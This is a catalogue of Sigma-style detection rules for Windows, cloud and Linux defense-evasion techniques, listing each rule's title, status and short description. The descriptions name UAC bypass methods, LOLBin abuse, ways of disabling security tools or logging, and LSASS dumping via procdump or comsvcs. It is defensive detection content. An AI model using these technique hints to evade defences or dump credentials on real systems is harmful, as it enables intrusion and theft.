attack.defense_evasion

Explorer NOUACCHECK Flag
level
status test

Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks

Wlrmdr Lolbin Use as Laucher
level
status experimental

Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute

Registry Defender Exclusions
level
status experimental

Qbot used reg.exe to add Defender folder exceptions for folders within AppData and ProgramData.

Process Access via TrolleyExpress Exclusion
level
status experimental

Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory

Suspicious Recursif Takeown
level
status experimental

Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders

Blackbyte Ransomware Registry
level
status experimental

BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption

Suspicious Execution of InstallUtil Without Log
level
status experimental

Uses the .NET InstallUtil.exe application in order to execute image without log

Disable System Firewall
level
status experimental

Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.

Suspicious Creation with Colorcpl
level
status experimental

Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\

Suspicious Msiexec Quiet Install
level
status experimental

Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)

Suspicious Msiexec Execute Arbitrary DLL
level
status experimental

Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)

Msiexec Initiated Connection
level
status experimental

Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)

Dism Remove Online Package
level
status experimental

Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images

Disable Administrative Share Creation at Startup
level
status experimental

Administrative shares are hidden network shares created by Microsoft’s Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system

Delete Log from Application
level
status experimental

Deletion of log files is a known anti-forensic technique

Use Remove-Item to Delete File
level
status experimental

Powershell Remove-Item with -Path to delete a file or a folder with “-Recurse”

Suspicious Unblock-File
level
status experimental

Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.

Suspicious Start-Process PassThru
level
status experimental

Powershell use PassThru option to start in background

Obfuscated Command Line Using Special Unicode Characters
level
status experimental

Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.

Rundll32 JS RunHTMLApplication Pattern
level
status experimental

Detects suspicious command line patterns used when rundll32 is used to run JavaScript code

Uninstall Sysinternals Sysmon
level
status experimental

Detects the uninstallation of Sysinternals Sysmon, which could be the result of legitimate administration or a manipulation for defense evasion

Sysmon Configuration Change
level
status experimental

Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration

Suspicious Regsvr32 HTTP IP Pattern
level
status experimental

Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN

NodejsTools PressAnyKey Lolbin
level
status experimental

Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary

DevInit Lolbin Download
level
status experimental

Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system

Procdump Evasion
level
status experimental

Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name

Abuse of Service Permissions to Hide Services in Tools
level
status experimental

Detection of sc.exe utility adding a new service with special permission which hides that service.

False Sysinternals Suite Tools
level
status experimental

Rename as a legitim Sysinternals Suite tools to evade detection

Suspicious NT Resource Kit Auditpol Usage
level
status experimental

Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.

CleanWipe Usage
level
status experimental

Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.

Suspicious Regsvr32 Execution With Image Extension
level
status experimental

utilizes REGSVR32.exe to execute this DLL masquerading as a Image file

Suspicious Extrac32 Alternate Data Stream Execution
level
status experimental

Extract data from cab file and hide it in an alternate data stream

Suspicious Extexport Execution
level
status experimental

Extexport.exe loads dll and is execute from other folder the original path

Suspicious Diantz Alternate Data Stream Execution
level
status experimental

Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.

Clearing Windows Console History
level
status experimental

Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.

Suspicious Subsystem for Linux Bash Execution
level
status experimental

Performs execution of specified file, can be used as a defensive evasion.

Suspicious aspnet_compiler.exe Execution
level
status experimental

Execute C# code with the Build Provider and proper folder structure in place.

Shell32 DLL Execution in Suspicious Directory
level
status experimental

Detects shell32.dll executing a DLL in a suspicious directory

Space After Filename - macOS
level
status experimental

Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.

New File Association Using Exefile
level
status experimental

Detects the abuse of the exefile handler in new file association. Used for bypass of security products.

Command Line Path Traversal Evasion
level
status experimental

Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal

Suspicious Del in CommandLine
level
status experimental

suspicious command line to remove exe or dll

Suspicious Load DLL via CertOC.exe
level
status experimental

Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.

Execution via stordiag.exe
level
status experimental

Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe

Execution via WorkFolders.exe
level
status experimental

Detects using WorkFolders.exe to execute an arbitrary control.exe

Suspicious PowerShell WindowStyle Option
level
status experimental

Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden

NetWire RAT Registry Key
level
status experimental

Attempts to detect registry events for common NetWire key HKCU\Software\NetWire

Terminal Server Client Connection History Cleared
level
status experimental

Detects the deletion of registry keys containing the MSTSC connection history

Windows Defender Real-Time Protection Disabled
level
status experimental

Detects disabling Windows Defender Real-Time Protection by modifying registry

Windows Firewall Profile Disabled
level
status experimental

Detects when a user disables the Windows Firewall via a Profile to help evade defense.

Prefetch File Deletion
level
status experimental

Detects the deletion of a prefetch file (AntiForensic)

Xwizard DLL Sideloading
level
status experimental

Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll

Chafer Activity
level
status experimental

Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018

Steganography Hide Files with Steghide
level
status experimental

Detects embeding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.

Steganography Extract Files with Steghide
level
status experimental

Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.

UAC Bypass Using ComputerDefaults
level
status experimental

Detects the pattern of UAC Bypass using computerdefaults.exe (UACMe 59)

DNS-over-HTTPS Enabled by Registry
level
status experimental

Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or be used to hide the process of exfiltrating data. With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.

Remove Exported Mailbox from Exchange Webserver
level
status experimental

Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit

UAC Bypass WSReset
level
status experimental

Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config

UAC Bypass Using WOW64 Logger DLL Hijack
level
status experimental

Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)

UAC Bypass Using Windows Media Player - Registry
level
status experimental

Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)

UAC Bypass Using Windows Media Player - Process
level
status experimental

Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)

UAC Bypass Using Windows Media Player - File
level
status experimental

Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)

UAC Bypass Using PkgMgr and DISM
level
status experimental

Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)

UAC Bypass Using NTFS Reparse Point - Process
level
status experimental

Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)

UAC Bypass Using NTFS Reparse Point - File
level
status experimental

Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)

UAC Bypass Using MSConfig Token Modification - Process
level
status experimental

Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)

UAC Bypass Using MSConfig Token Modification - File
level
status experimental

Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)

UAC Bypass Using IEInstal - Process
level
status experimental

Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)

UAC Bypass Using IEInstal - File
level
status experimental

Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)

UAC Bypass Using DismHost
level
status experimental

Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)

UAC Bypass Using Disk Cleanup
level
status experimental

Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)

UAC Bypass Using Consent and Comctl32 - Process
level
status experimental

Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)

UAC Bypass Using Consent and Comctl32 - File
level
status experimental

Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)

UAC Bypass Using ChangePK and SLUI
level
status experimental

Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)

UAC Bypass Using .NET Code Profiler on MMC
level
status experimental

Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)

UAC Bypass Abusing Winsat Path Parsing - Registry
level
status experimental

Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)

UAC Bypass Abusing Winsat Path Parsing - Process
level
status experimental

Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)

UAC Bypass Abusing Winsat Path Parsing - File
level
status experimental

Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)

Shell Open Registry Keys Manipulation
level
status experimental

Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)

Created Files by Office Applications
level
status experimental

This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.

New Lolbin Process by Office Applications
level
status experimental

This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated.

Lolbins Process Creation with WmiPrvse
level
status experimental

This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed.

EDR WMI Command Execution by Office Applications
level
status experimental

Initial execution of malicious document calls wmic Win32_Process::Create to execute the file with regsvr32

TrustedPath UAC Bypass Pattern
level
status test

Detects indicators of a UAC bypass method by mocking directories

Azure Active Directory Hybrid Health AD FS Service Delete
level
status experimental

This detection uses AzureActivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant. A threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs. The health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure.

Azure Active Directory Hybrid Health AD FS New Server
level
status experimental

This detection uses AzureActivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service. A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server. This can be done programmatically via HTTP requests to Azure.

Suspicious Splwow64 Without Params
level
status experimental

Detects suspicious Splwow64.exe process without any command line parameters

EfsPotato Named Pipe
level
status experimental

Detects the pattern of a pipe name as used by the tool EfsPotato

Powerup Write Hijack DLL
level
status experimental

Powerup tool’s Write Hijack DLL exploits DLL hijacking for privilege escalation. In it’s default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies on creation of the malicious bat file (debug.bat by default).

Procdump Usage
level
status experimental

Detects uses of the SysInternals Procdump utility

Google Cloud Firewall Modified or Deleted
level
status experimental

Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).

WinDivert Driver Load
level
status experimental

Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows

AWS Macie Evasion
level
status experimental

Detects evade to Macie detection.

Azure Kubernetes Events Deleted
level
status experimental

Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.

Regsvr32 Command Line Without DLL
level
status experimental

Detects a regsvr.exe execution that doesn’t contain a DLL in the command line

SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code
level
status experimental

Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs

Reg Disable Security Service
level
status experimental

Detects a suspicious reg.exe invocation that looks as if it would disable an important security service

Abusable Invoke-ATHRemoteFXvGPUDisablementCommand
level
status experimental

RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).

Windows Defender Exclusions Added
level
status stable

Detects the Setting of Windows Defender Exclusions

ProtocolHandler.exe Downloaded Suspicious File
level
status experimental

Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file.

Mavinject Inject DLL Into Running Process
level
status experimental

Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.

AWS SecurityHub Findings Evasion
level
status stable

Detects the modification of the findings on SecurityHub.

Emotet RunDLL32 Process Creation
level
status experimental

Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL

Conhost Parent Process Executions
level
status experimental

Detects the conhost execution as parent process. Can be used to evaded defense mechanism.

Windows Defender Malware Detection History Deletion
level
status experimental

Windows Defender logs when the history of detected infections is deleted. Log file will contain the message “Windows Defender Antivirus has removed history of malware and other potentially unwanted software”.

Winnti Pipemon Characteristics
level
status stable

Detects specific process characteristics of Winnti Pipemon malware reported by ESET

Empire UserAgent URI Combo
level
status test

Detects user agent and URI paths used by empire agents

Regsvr32 Flags Anomaly
level
status test

Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time

EvilNum Golden Chickens Deployment via OCX Files
level
status test

Detects Golden Chickens deployment method as used by Evilnum in report published in July 2020

Explorer Root Flag Process Tree Break
level
status test

Detects a command line process that uses explorer.exe /root, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer

Windows Defender Threat Detection Disabled
level
status stable

Detects disabling Windows Defender threat protection

Disabled IE Security Features
level
status test

Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features

Ke3chang Registry Key Modifications
level
status test

Detects Registry modifications performed by Ke3chang malware in campaigns running in 2019 and 2020

Suspicious New Printer Ports in Registry (CVE-2020-1048)
level
status test

Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048

Notepad Making Network Connection
level
status test

Detects suspicious network connection by Notepad

Process Dump via Rundll32 and Comsvcs.dll
level
status experimental

Detects a process memory dump performed via ordinal function 24 in comsvcs.dll

AWS GuardDuty Important Change
level
status experimental

Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.

Wsreset UAC Bypass
level
status test

Detects a method that uses Wsreset.exe tool that can be used to reset the Windows Store to bypass UAC

FromBase64String Command Line
level
status test

Detects suspicious FromBase64String expressions in command line arguments

ZOHO Dctask64 Process Injection
level
status test

Detects suspicious process injection using ZOHO’s dctask64.exe

Renamed ZOHO Dctask64
level
status test

Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation

AWS CloudTrail Important Change
level
status experimental

Detects disabling, deleting and updating of a Trail

Audit CVE Event
level
status experimental

Detects events generated by Windows to indicate the exploitation of a known vulnerability (e.g. CVE-2020-0601)

Tasks Folder Evasion
level
status experimental

The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr

Operation Wocao Activity
level
status experimental

Detects activity mentioned in Operation Wocao report

Renamed ProcDump
level
status experimental

Detects the execution of a renamed ProcDump executable often used by attackers or malware

Cisco File Deletion
level
status test

See what files are being deleted from flash file systems

Cisco Disabling Logging
level
status test

Turn off logging locally or remote

Cisco Crypto Commands
level
status test

Show when private keys are being exported from the device, or when new certificates are installed

Cisco Clear Logs
level
status test

Clear command history in network OS which is used for defense evasion

Suspicious MsiExec Directory
level
status test

Detects suspicious msiexec process starts in an uncommon directory

Masquerading as Linux Crond Process
level
status test

Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.

Suspicious Remote Thread Created
level
status experimental

Offensive tradecraft is switching away from using APIs like “CreateRemoteThread”, however, this is still largely observed in the wild. This rule aims to detect suspicious processes (those we would not expect to behave in this way like word.exe or outlook.exe) creating remote threads on other processes. It is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.

New or Renamed User Account with '$' in Attribute 'SamAccountName'.
level
status experimental

Detects possible bypass EDR and SIEM via abnormal user account name.

Svchost DLL Search Order Hijack
level
status test

IKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\Windows\System32\ by default. An attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services “svchost.exe -k netsvcs” to gain code execution on a remote machine.

Suspicious Bitsadmin Job via PowerShell
level
status test

Detect download by BITS jobs via PowerShell

Mshta JavaScript Execution
level
status test

Identifies suspicious mshta.exe commands.

Modification of ld.so.preload
level
status test

Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.

Indirect Command Execution
level
status test

Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe).

HH.exe Execution
level
status test

Identifies usage of hh.exe executing recently modified .chm files.

Bypass UAC via CMSTP
level
status test

Detect child processes of automatically elevated instances of Microsoft Connection Manager Profile Installer (cmstp.exe).

Possible Privilege Escalation via Weak Service Permissions
level
status test

Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand

Application Whitelisting Bypass via Dnx.exe
level
status test

Execute C# code located in the consoleapp folder

Possible App Whitelisting Bypass via WinDbg/CDB as a Shellcode Runner
level
status test

Launch 64-bit shellcode from a debugger script file using cdb.exe.

Windows Defender Exclusion Set
level
status test

Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender

Application Whitelisting Bypass via Bginfo
level
status test

Execute VBscript code that is referenced within the *.bgi file.

Application Whitelisting Bypass via DLL Loaded by odbcconf.exe
level
status test

Detects defence evasion attempt via odbcconf.exe execution to load DLL

Regsvr32 Network Activity
level
status experimental

Detects network connections and DNS queries initiated by Regsvr32.exe

Logging Configuration Changes on Linux Host
level
status test

Detect changes of syslog daemons configuration files

Auditing Configuration Changes on Linux Host
level
status test

Detect changes in auditd configuration files

RDP Registry Modification
level
status test

Detects potential malicious modification of the property value of fDenyTSConnections and UserAuthentication to enable remote desktop connections.

CreateRemoteThread API and LoadLibrary
level
status test

Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process

AD Object WriteDAC Access
level
status test

Detects WRITE_DAC access to a domain object

Remove Immutable File Attribute
level
status test

Detects removing immutable file attribute.

File or Folder Permissions Modifications
level
status test

Detects a file or folder’s permissions being modified.

File or Folder Permissions Change
level
status test

Detects file and folder permission changes.

Sysmon Driver Unload
level
status experimental

Detect possible Sysmon driver unload

Devtoolslauncher.exe Executes Specified Binary
level
status test

The Devtoolslauncher.exe executes other binary

Suspicious Call by Ordinal
level
status stable

Detects suspicious calls of DLLs in rundll32.dll exports by ordinal

Suspicious Code Page Switch
level
status test

Detects a code page switch in command line or batch scripts to a rare language

Emotet Process Creation
level
status test

Detects all Emotet like process executions that are not covered by the more generic rules

Control Panel Items
level
status test

Detects the malicious use of a control panel item

Renamed PowerShell
level
status test

Detects the execution of a renamed PowerShell often used by attackers or malware

Suspicious Userinit Child Process
level
status experimental

Detects a suspicious child process of userinit

Renamed Binary
level
status test

Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.

Highly Relevant Renamed Binary
level
status test

Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.

Renamed PsExec
level
status test

Detects the execution of a renamed PsExec often used by attackers or malware

OceanLotus Registry Activity
level
status experimental

Detects registry keys created in OceanLotus (also known as APT32) attacks

Clear Command History
level
status experimental

Clear command history in linux which is used for defense evasion.

Disable of ETW Trace
level
status test

Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.

MSHTA Suspicious Execution 01
level
status test

Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism

Baby Shark Activity
level
status test

Detects activity that could be related to Baby Shark malware

RDP over Reverse SSH Tunnel WFP
level
status experimental

Detects svchost hosting RDP termsvcs communicating with the loopback address

Windows Shell Spawning Suspicious Program
level
status test

Detects a suspicious child process of a Windows shell

Taskmgr as Parent
level
status test

Detects the creation of a process from Windows task manager

Suspicious Use of Procdump on LSASS
level
status stable

Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we’re also able to catch cases in which the attacker has renamed the procdump executable.

Suspicious Use of Procdump
level
status experimental

Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter ’ -ma ’ and ’ -accepteula’ in a single step. This way we’re also able to catch cases in which the attacker has renamed the procdump executable.

Suspicious Svchost Process
level
status experimental

Detects a suspicious svchost process start

Suspicious RASdial Activity
level
status test

Detects suspicious process related to rasdial.exe

Suspicious Control Panel DLL Load
level
status test

Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits

Suspicious Commandline Escape
level
status test

Detects suspicious process that use escape characters

Suspicious Certutil Command
level
status experimental

Detects a suspicious Microsoft certutil execution with sub commands like ‘decode’ sub command, which is sometimes used to decode malicious code with the built-in certutil utility

Regsvr32 Anomaly
level
status experimental

Detects various anomalies in relation to regsvr32.exe

Powershell AMSI Bypass via .NET Reflection
level
status test

Detects Request to amsiInitFailed that can be used to disable AMSI Scanning

Possible Applocker Bypass
level
status test

Detects execution of executables that can be used to bypass Applocker whitelisting

Ping Hex IP
level
status test

Detects a ping command that uses a hex encoded IP address

NotPetya Ransomware Activity
level
status test

Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and windows eventlogs are cleared using wevtutil

MsiExec Web Install
level
status test

Detects suspicious msiexec process starts with web addresses as parameter

MSHTA Spwaned by SVCHOST
level
status test

Detects MSHTA.EXE spwaned by SVCHOST as seen in LethalHTA and described in report

Microsoft Workflow Compiler
level
status experimental

Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.

Hiding Files with Attrib.exe
level
status test

Detects usage of attrib.exe to hide files from users.

File Created with System Process Name
level
status test

Detects the creation of an executable with a system process name in a suspicious folder

Executable Used by PlugX in Uncommon Location
level
status test

Detects the execution of an executable that is typically used by PlugX for DLL side loading started from an uncommon location

Dridex Process Pattern
level
status test

Detects typical Dridex process patterns

Detection of PowerShell Execution via DLL
level
status test

Detects PowerShell Strings applied to rundll as seen in PowerShdll.dll

CMSTP UAC Bypass via COM Object Access
level
status stable

Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)

CobaltStrike Process Injection
level
status experimental

Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons

CobaltStrike Malleable (OCSP) Profile
level
status test

Detects Malleable (OCSP) Profile with Typo (OSCP) in URL

NTFS Alternate Data Stream
level
status experimental

Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.

CMSTP Execution Registry Event
level
status stable

Detects various indicators of Microsoft Connection Manager Profile Installer execution

CMSTP Execution Process Creation
level
status stable

Detects various indicators of Microsoft Connection Manager Profile Installer execution

CMSTP Execution Process Access
level
status stable

Detects various indicators of Microsoft Connection Manager Profile Installer execution

PowerShell Rundll32 Remote Thread Creation
level
status experimental

Detects PowerShell remote thread creation in Rundll32.exe

Taskmgr as LOCAL_SYSTEM
level
status experimental

Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM

Exploit for CVE-2015-1641
level
status stable

Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641

Equation Group DLL_U Load
level
status stable

Detects a specific tool and export used by EquationGroup

Disabling Windows Event Auditing
level
status test

Detects scenarios where system auditing (ie: windows event log auditing) is disabled. This may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed. Also, it is recommended to turn off “Local Group Policy Object Processing” via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as “gpedit.msc”. Please note, that disabling “Local Group Policy Object Processing” may cause an issue in scenarios of one off specific GPO modifications – however it is recommended to perform these modifications in Active Directory anyways.

Ps.exe Renamed SysInternals Tool
level
status test

Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report

ZxShell Malware
level
status test

Detects a ZxShell start by the called and well-known function name

Secure Deletion with SDelete
level
status test

Detects renaming of file while deletion with SDelete tool.

DHCP Server Loaded the CallOut DLL
level
status experimental

This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded

DHCP Server Error Failed Loading the CallOut DLL
level
status experimental

This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded

DHCP Callout DLL Installation
level
status test

Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)

PowerShell Downgrade Attack
level
status experimental

Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0

UAC Bypass via Event Viewer
level
status experimental

Detects UAC bypass method using Windows event viewer

UAC Bypass via Sdclt
level
status experimental

Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)

Windows PowerShell User Agent
level
status test

Detects Windows PowerShell Web Access

Account Tampering - Suspicious Failed Logon Reasons
level
status experimental

This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.

Wuauclt Network Connection
level
status test

Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections. One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.

WSL Execution
level
status test

Detects Possible usage of Windows Subsystem for Linux (WSL) binary as a LOLBIN

Writing Of Malicious Files To The Fonts Folder
level
status experimental

Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn’t require admin privillege to be written and executed from.

Write Protect For Storage Disabled
level
status experimental

Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.

Wmic Uninstall Security Product
level
status experimental

Detects deinstallation of security products using WMIC utility

WMIC Loading Scripting Libraries
level
status test

Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the /FORMAT argument switch to download and execute an XSL file (i.e js, vbs, etc).

Winword.exe Loads Suspicious DLL
level
status test

Detects Winword.exe loading of custmom dll via /l cmd switch

Winnti Malware HK University Campaign
level
status test

Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities

Windows Spooler Service Suspicious File Deletion
level
status experimental

Detect DLL deletions from Spooler Service driver folder

Windows Spooler Service Suspicious Binary Load
level
status experimental

Detect DLL Load from Spooler Service backup folder

Weak Encryption Enabled and Kerberoast
level
status test

Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.

Wdigest Enable UseLogonCredential
level
status experimental

Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials

Wdigest CredGuard Registry Modification
level
status test

Detects potential malicious modification of the property value of IsCredGuardEnabled from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system. This is usually used with UseLogonCredential to manipulate the caching credentials.

Visual Basic Command Line Compiler Usage
level
status test

Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.

Verclsid.exe Runs COM Object
level
status test

Detects when verclsid.exe is used to run COM object via GUID

Using SettingSyncHost.exe as LOLBin
level
status test

Detects using SettingSyncHost.exe to run hijacked binary

Using AppVLP To Circumvent ASR File Path Rule
level
status experimental

Application Virtualization Utility is included with Microsoft Office. We are able to abuse “AppVLP” to execute shell commands. Normally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder or to mark a file as a system file.

Uninstall Crowdstrike Falcon
level
status experimental

Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon

Unauthorized System Time Modification
level
status test

Detect scenarios where a potentially unauthorized application or user is modifying the system time.

UAC Bypass With Fake DLL
level
status experimental

Attempts to load dismcore.dll after dropping it

UAC Bypass Via Wsreset
level
status test

Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.

Turla ComRAT
level
status test

Detects Turla ComRAT patterns

Time Travel Debugging Utility Usage
level
status experimental

Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.

Telegram API Access
level
status test

Detects suspicious requests to Telegram API without the usual Telegram User-Agent

Tamper Windows Defender
level
status experimental

Attempting to disable scheduled scanning and other parts of windows defender atp.

Sysmon Channel Reference Deletion
level
status test

Potential threat actor tampering with Sysmon manifest and eventually disabling it

Sysinternals SDelete Registry Keys
level
status experimental

A General detection to trigger for the creation or modification of .*\Software\Sysinternals\SDelete registry keys. Indicators of the use of Sysinternals SDelete tool.

Sysinternals SDelete File Deletion
level
status test

A General detection to trigger for the deletion of files by Sysinternals SDelete. It looks for the common name pattern used to rename files.

SyncAppvPublishingServer Execution to Bypass Powershell Restriction
level
